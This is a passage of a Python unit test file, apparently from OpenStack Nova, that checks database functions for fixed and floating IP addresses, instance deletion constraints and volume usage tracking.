{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None}
]
db.fixed_ip_bulk_create(self.ctxt, params)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at',
'virtual_interface', 'network', 'floating_ips']
fixed_ip_data = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
# we have no `id` in incoming data so we can not use
# _assertEqualListsOfObjects to compare incoming data and received
# objects
fixed_ip_data = sorted(fixed_ip_data, key=lambda i: i['network_id'])
params = sorted(params, key=lambda i: i['network_id'])
for param, ip in zip(params, fixed_ip_data):
self._assertEqualObjects(param, ip, ignored_keys)
def test_fixed_ip_disassociate(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
values = {'address': '192.168.1.5', 'instance_uuid': instance_uuid}
vif = db.virtual_interface_create(self.ctxt, values)
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': vif['id']
}
db.fixed_ip_create(self.ctxt, param)
db.fixed_ip_disassociate(self.ctxt, address)
fixed_ip_data = db.fixed_ip_get_by_address(self.ctxt, address)
ignored_keys = ['created_at', 'id', 'deleted_at',
'updated_at', 'instance_uuid',
'virtual_interface_id']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
self.assertIsNone(fixed_ip_data['instance_uuid'])
self.assertIsNone(fixed_ip_data['virtual_interface_id'])
def test_fixed_ip_get_not_found_exception(self):
self.assertRaises(exception.FixedIpNotFound,
db.fixed_ip_get, self.ctxt, 0)
def test_fixed_ip_get_success2(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
fixed_ip_id = db.fixed_ip_create(self.ctxt, param)
self.ctxt.is_admin = False
self.assertRaises(exception.Forbidden, db.fixed_ip_get,
self.ctxt, fixed_ip_id)
def test_fixed_ip_get_success(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
db.fixed_ip_create(self.ctxt, param)
fixed_ip_id = db.fixed_ip_get_by_address(self.ctxt, address)['id']
fixed_ip_data = db.fixed_ip_get(self.ctxt, fixed_ip_id)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_get_by_address(self):
instance_uuid = self._create_instance()
db.fixed_ip_create(self.ctxt, {'address': '1.2.3.4',
'instance_uuid': instance_uuid,
})
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, '1.2.3.4',
columns_to_join=['instance'])
self.assertIn('instance', fixed_ip.__dict__)
self.assertEqual(instance_uuid, fixed_ip.instance.uuid)
def test_fixed_ip_update_not_found_for_address(self):
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_update, self.ctxt,
'192.168.1.5', {})
def test_fixed_ip_update(self):
instance_uuid_1 = self._create_instance()
instance_uuid_2 = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
param_1 = {
'reserved': True, 'deleted': 0, 'leased': True,
'host': '192.168.133.1', 'address': '10.0.0.2',
'allocated': True, 'instance_uuid': instance_uuid_1,
'network_id': network_id_1, 'virtual_interface_id': '123',
}
param_2 = {
'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': '10.0.0.3', 'allocated': False,
'instance_uuid': instance_uuid_2, 'network_id': network_id_2,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_addr = db.fixed_ip_create(self.ctxt, param_1)['address']
db.fixed_ip_update(self.ctxt, fixed_ip_addr, param_2)
fixed_ip_after_update = db.fixed_ip_get_by_address(self.ctxt,
param_2['address'])
self._assertEqualObjects(param_2, fixed_ip_after_update, ignored_keys)
class FloatingIpTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(FloatingIpTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'address': '1.1.1.1',
'fixed_ip_id': None,
'project_id': 'fake_project',
'host': 'fake_host',
'auto_assigned': False,
'pool': 'fake_pool',
'interface': 'fake_interface',
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_floating_ip(self, values):
if not values:
values = {}
vals = self._get_base_values()
vals.update(values)
return db.floating_ip_create(self.ctxt, vals)
def test_floating_ip_get(self):
values = [{'address': '0.0.0.0'}, {'address': '1.1.1.1'}]
floating_ips = [self._create_floating_ip(val) for val in values]
for floating_ip in floating_ips:
real_floating_ip = db.floating_ip_get(self.ctxt, floating_ip['id'])
self._assertEqualObjects(floating_ip, real_floating_ip,
ignored_keys=['fixed_ip'])
def test_floating_ip_get_not_found(self):
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, 100500)
def test_floating_ip_get_with_long_id_not_found(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidID,
db.floating_ip_get, self.ctxt, 123456789101112)
def test_floating_ip_get_pools(self):
values = [
{'address': '0.0.0.0', 'pool': 'abc'},
{'address': '1.1.1.1', 'pool': 'abc'},
{'address': '2.2.2.2', 'pool': 'def'},
{'address': '3.3.3.3', 'pool': 'ghi'},
]
for val in values:
self._create_floating_ip(val)
expected_pools = [{'name': x}
for x in set(map(lambda x: x['pool'], values))]
real_pools = db.floating_ip_get_pools(self.ctxt)
self._assertEqualListsOfPrimitivesAsSets(real_pools, expected_pools)
def test_floating_ip_allocate_address(self):
pools = {
'pool1': ['0.0.0.0', '1.1.1.1'],
'pool2': ['2.2.2.2'],
'pool3': ['3.3.3.3', '4.4.4.4', '5.5.5.5']
}
for pool, addresses in pools.iteritems():
for address in addresses:
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
for pool, addresses in pools.iteritems():
alloc_addrs = []
for i in addresses:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
alloc_addrs.append(float_addr)
self._assertEqualListsOfPrimitivesAsSets(alloc_addrs, addresses)
def test_floating_ip_allocate_auto_assigned(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
float_ips = []
for i in range(0, 2):
float_ips.append(self._create_floating_ip(
{"address": addresses[i]}))
for i in range(2, 4):
float_ips.append(self._create_floating_ip({"address": addresses[i],
"auto_assigned": True}))
for i in range(0, 2):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertFalse(float_ip.auto_assigned)
for i in range(2, 4):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertTrue(float_ip.auto_assigned)
def test_floating_ip_allocate_address_no_more_floating_ips(self):
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
def test_floating_ip_allocate_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_allocate_address,
ctxt, 'other_project_id', 'any_pool')
def test_floating_ip_allocate_address_succeeds_retry(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
floating_ip = self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
if mock_first.call_count == 1:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
else:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
self.assertEqual(address, float_addr)
self.assertEqual(2, mock_first.call_count)
float_ip = db.floating_ip_get(self.ctxt, floating_ip.id)
self.assertEqual(project_id, float_ip['project_id'])
def test_floating_ip_allocate_address_retry_limit_exceeded(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FloatingIpAllocateFailed,
db.floating_ip_allocate_address, self.ctxt,
project_id, pool)
self.assertEqual(5, mock_first.call_count)
def test_floating_ip_allocate_address_no_more_ips_with_no_retries(self):
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
self.assertEqual(1, mock_first.call_count)
def _get_existing_ips(self):
return [ip['address'] for ip in db.floating_ip_get_all(self.ctxt)]
def test_floating_ip_bulk_create(self):
expected_ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
result = db.floating_ip_bulk_create(self.ctxt,
map(lambda x: {'address': x}, expected_ips),
want_result=False)
self.assertIsNone(result)
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_ips)
def test_floating_ip_bulk_create_duplicate(self):
ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
prepare_ips = lambda x: {'address': x}
result = db.floating_ip_bulk_create(self.ctxt, map(prepare_ips, ips))
self.assertEqual(ips, [ip.address for ip in result])
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_bulk_create,
self.ctxt, map(prepare_ips, ['1.1.1.5', '1.1.1.4']),
want_result=False)
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '1.1.1.5')
def test_floating_ip_bulk_destroy(self):
ips_for_delete = []
ips_for_non_delete = []
def create_ips(i, j):
return [{'address': '1.1.%s.%s' % (i, k)} for k in range(1, j + 1)]
# NOTE(boris-42): Create more than 256 ip to check that
# _ip_range_splitter works properly.
for i in range(1, 3):
ips_for_delete.extend(create_ips(i, 255))
ips_for_non_delete.extend(create_ips(3, 255))
result = db.floating_ip_bulk_create(self.ctxt,
ips_for_delete + ips_for_non_delete,
want_result=False)
self.assertIsNone(result)
non_bulk_ips_for_delete = create_ips(4, 3)
non_bulk_ips_for_non_delete = create_ips(5, 3)
non_bulk_ips = non_bulk_ips_for_delete + non_bulk_ips_for_non_delete
project_id = 'fake_project'
reservations = quota.QUOTAS.reserve(self.ctxt,
floating_ips=len(non_bulk_ips),
project_id=project_id)
for dct in non_bulk_ips:
self._create_floating_ip(dct)
quota.QUOTAS.commit(self.ctxt, reservations, project_id=project_id)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 6, 'reserved': 0}})
ips_for_delete.extend(non_bulk_ips_for_delete)
ips_for_non_delete.extend(non_bulk_ips_for_non_delete)
db.floating_ip_bulk_destroy(self.ctxt, ips_for_delete)
expected_addresses = map(lambda x: x['address'], ips_for_non_delete)
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_addresses)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 3, 'reserved': 0}})
def test_floating_ip_create(self):
floating_ip = self._create_floating_ip({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self.assertIsNotNone(floating_ip['id'])
self._assertEqualObjects(floating_ip, self._get_base_values(),
ignored_keys)
def test_floating_ip_create_duplicate(self):
self._create_floating_ip({})
self.assertRaises(exception.FloatingIpExists,
self._create_floating_ip, {})
def _create_fixed_ip(self, params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_floating_ip_fixed_ip_associate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
float_ips = [self._create_floating_ip({'address': address})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed_ip = db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
self.assertEqual(fixed_ip.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertEqual(fixed_ip.id, updated_float_ip.fixed_ip_id)
self.assertEqual('host', updated_float_ip.host)
# Test that already allocated float_ip returns None
result = db.floating_ip_fixed_ip_associate(self.ctxt,
float_addresses[0],
fixed_addresses[0], 'host')
self.assertIsNone(result)
def test_floating_ip_fixed_ip_associate_float_ip_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_fixed_ip_associate,
self.ctxt, '10.10.10.10', 'some', 'some')
def test_floating_ip_deallocate(self):
values = {'address': '1.1.1.1', 'project_id': 'fake', 'host': 'fake'}
float_ip = self._create_floating_ip(values)
rows_updated = db.floating_ip_deallocate(self.ctxt, float_ip.address)
self.assertEqual(1, rows_updated)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.project_id)
self.assertIsNone(updated_float_ip.host)
self.assertFalse(updated_float_ip.auto_assigned)
def test_floating_ip_deallocate_address_not_found(self):
self.assertEqual(0, db.floating_ip_deallocate(self.ctxt, '2.2.2.2'))
def test_floating_ip_destroy(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
expected_len = len(addresses)
for float_ip in float_ips:
db.floating_ip_destroy(self.ctxt, float_ip.address)
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, float_ip.id)
expected_len -= 1
if expected_len > 0:
self.assertEqual(expected_len,
len(db.floating_ip_get_all(self.ctxt)))
else:
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_disassociate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
float_ips = [self._create_floating_ip({'address': address})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed = db.floating_ip_disassociate(self.ctxt, float_ip.address)
self.assertEqual(fixed.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.fixed_ip_id)
self.assertIsNone(updated_float_ip.host)
def test_floating_ip_disassociate_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_disassociate, self.ctxt,
'11.11.11.11')
def test_floating_ip_get_all(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
self._assertEqualListsOfObjects(float_ips,
db.floating_ip_get_all(self.ctxt),
ignored_keys="fixed_ip")
def test_floating_ip_get_all_associated(self):
instance = db.instance_create(self.ctxt, {'uuid': 'fake'})
float_ip = self._create_floating_ip({'address': '1.1.1.1'})
fixed_ip = self._create_fixed_ip({'address': '2.2.2.2',
'instance_uuid': instance.uuid})
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_ip,
'host')
float_ips = db.floating_ip_get_all(self.ctxt)
self.assertEqual(1, len(float_ips))
self.assertEqual(float_ip.address, float_ips[0].address)
self.assertEqual(fixed_ip, float_ips[0].fixed_ip.address)
self.assertEqual(instance.uuid, float_ips[0].fixed_ip.instance_uuid)
def test_floating_ip_get_all_not_found(self):
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_get_all_by_host(self):
hosts = {
'host1': ['1.1.1.1', '1.1.1.2'],
'host2': ['2.1.1.1', '2.1.1.2'],
'host3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
hosts_with_float_ips = {}
for host, addresses in hosts.iteritems():
hosts_with_float_ips[host] = []
for address in addresses:
float_ip = self._create_floating_ip({'host': host,
'address': address})
hosts_with_float_ips[host].append(float_ip)
for host, float_ips in hosts_with_float_ips.iteritems():
real_float_ips = db.floating_ip_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys="fixed_ip")
def test_floating_ip_get_all_by_host_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForHost,
db.floating_ip_get_all_by_host,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_all_by_project(self):
projects = {
'pr1': ['1.1.1.1', '1.1.1.2'],
'pr2': ['2.1.1.1', '2.1.1.2'],
'pr3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
projects_with_float_ips = {}
for project_id, addresses in projects.iteritems():
projects_with_float_ips[project_id] = []
for address in addresses:
float_ip = self._create_floating_ip({'project_id': project_id,
'address': address})
projects_with_float_ips[project_id].append(float_ip)
for project_id, float_ips in projects_with_float_ips.iteritems():
real_float_ips = db.floating_ip_get_all_by_project(self.ctxt,
project_id)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys='fixed_ip')
def test_floating_ip_get_all_by_project_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_get_all_by_project,
ctxt, 'other_project')
def test_floating_ip_get_by_address(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
for float_ip in float_ips:
real_float_ip = db.floating_ip_get_by_address(self.ctxt,
float_ip.address)
self._assertEqualObjects(float_ip, real_float_ip,
ignored_keys='fixed_ip')
def test_floating_ip_get_by_address_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '20.20.20.20')
def test_floating_ip_get_by_invalid_address(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.floating_ip_get_by_address,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_by_fixed_address(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
self._create_floating_ip({'address': float_addr})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
float_ip = db.floating_ip_get_by_fixed_address(self.ctxt,
fixed_addr)
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_get_by_fixed_ip_id(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
self._create_floating_ip({'address': float_addr})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, fixed_addr)
float_ip = db.floating_ip_get_by_fixed_ip_id(self.ctxt,
fixed_ip['id'])
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_update(self):
float_ip = self._create_floating_ip({})
values = {
'project_id': 'some_pr',
'host': 'some_host',
'auto_assigned': True,
'interface': 'some_interface',
'pool': 'some_pool'
}
floating_ref = db.floating_ip_update(self.ctxt, float_ip['address'],
values)
self.assertIsNotNone(floating_ref)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip['id'])
self._assertEqualObjects(updated_float_ip, values,
ignored_keys=['id', 'address', 'updated_at',
'deleted_at', 'created_at',
'deleted', 'fixed_ip_id',
'fixed_ip'])
def test_floating_ip_update_to_duplicate(self):
float_ip1 = self._create_floating_ip({'address': '1.1.1.1'})
float_ip2 = self._create_floating_ip({'address': '1.1.1.2'})
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_update,
self.ctxt, float_ip2['address'],
{'address': float_ip1['address']})
class InstanceDestroyConstraints(test.TestCase):
def test_destroy_with_equal_any_constraint_met_single_value(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting',
'error'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'resize'})
constraint = db.constraint(vm_state=db.equal_any('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
def test_destroy_with_not_equal_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.not_equal('error', 'resize'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_not_equal_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'active'})
constraint = db.constraint(vm_state=db.not_equal('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
class VolumeUsageDBApiTestCase(test.TestCase):
def setUp(self):
super(VolumeUsageDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
self.useFixture(test.TimeOverride())
def test_vol_usage_update_no_totals_update(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
timeutils.set_time_override(now)
start_time = now - datetime.timedelta(seconds=10)
expected_vol_usages = {
u'1': {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'user_id': 'fake-user-uuid1',
'curr_reads': 1000,
'curr_read_bytes': 2000,
'curr_writes': 3000,
'curr_write_bytes': 4000,
'curr_last_refreshed': now,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None},
u'2': {'volume_id': u'2',
'instance_uuid': 'fake-instance-uuid2',
'project_id': 'fake-project-uuid2',
'user_id': 'fake-user-uuid2',
'curr_reads': 100,
'curr_read_bytes': 200,
'curr_writes': 300,
'curr_write_bytes': 400,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None}
}
def _compare(vol_usage, expected):
for key, value in expected.items():
self.assertEqual(vol_usage[key], value)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1', rd_req=10, rd_bytes=20,
wr_req=30, wr_bytes=40,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'2', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid2',
project_id='fake-project-uuid2',
user_id='fake-user-uuid2',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'1', rd_req=1000, rd_bytes=2000,
wr_req=3000, wr_bytes=4000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 2)
for usage in vol_usages:
_compare(usage, expected_vol_usages[usage.volume_id])
def test_vol_usage_update_totals_update(self):
ctxt = context.get_admin_context()
now = datetime.datetime(1, 1, 1, 1, 0, 0)
start_time = now - datetime.timedelta(seconds=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
timeutils.set_time_override(now)
db.vol_usage_update(ctxt, u'1', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 0)
self.assertEqual(current_usage['curr_reads'], 100)
timeutils.set_time_override(now1)
db.vol_usage_update(ctxt, u'1', rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 0)
timeutils.set_time_override(now2)
db.vol_usage_update(ctxt, u'1', rd_req=300, rd_bytes=400,
wr_req=500, wr_bytes=600,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
availability_zone='fake-az',
user_id='fake-user-uuid')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 300)
timeutils.set_time_override(now3)
db.vol_usage_update(ctxt, u'1', rd_req=400, rd_bytes=500,
wr_req=600, wr_bytes=700,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
expected_vol_usages = {'volume_id': u'1',
'project_id': 'fake-project-uuid',
'user_id': 'fake-user-uuid',
'instance_uuid': 'fake-instance-uuid',
'availability_zone': 'fake-az',
'tot_reads': 600,
'tot_read_bytes': 800,
'tot_writes': 1000,
'tot_write_bytes': 1200,
'tot_last_refreshed': now3,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'curr_last_refreshed': now2}
self.assertEqual(1, len(vol_usages))
for key, value in expected_vol_usages.items():
self.assertEqual(vol_usages[0][key], value, key)
def test_vol_usage_update_when_blockdevicestats_reset(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
# Instance rebooted or crashed. block device stats were reset and are
# less than the previous values
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
db.vol_usage_update(ctxt, u'1',
rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 200,
'curr_read_bytes': 300,
'curr_writes': 400,
'curr_write_bytes': 500,
'tot_reads': 10000,
'tot_read_bytes': 20000,
'tot_writes': 30000,
'tot_write_bytes': 40000}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
def test_vol_usage_update_totals_update_when_blockdevicestats_reset(self):
# This is unlikely to happen, but could when a volume is detached
# right after a instance has rebooted / recovered and before
# the system polled and updated the volume usage cache table.
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
# Instance rebooted or crashed. block device stats were reset and are
# less than the previous values
db.vol_usage_update(ctxt, u'1',
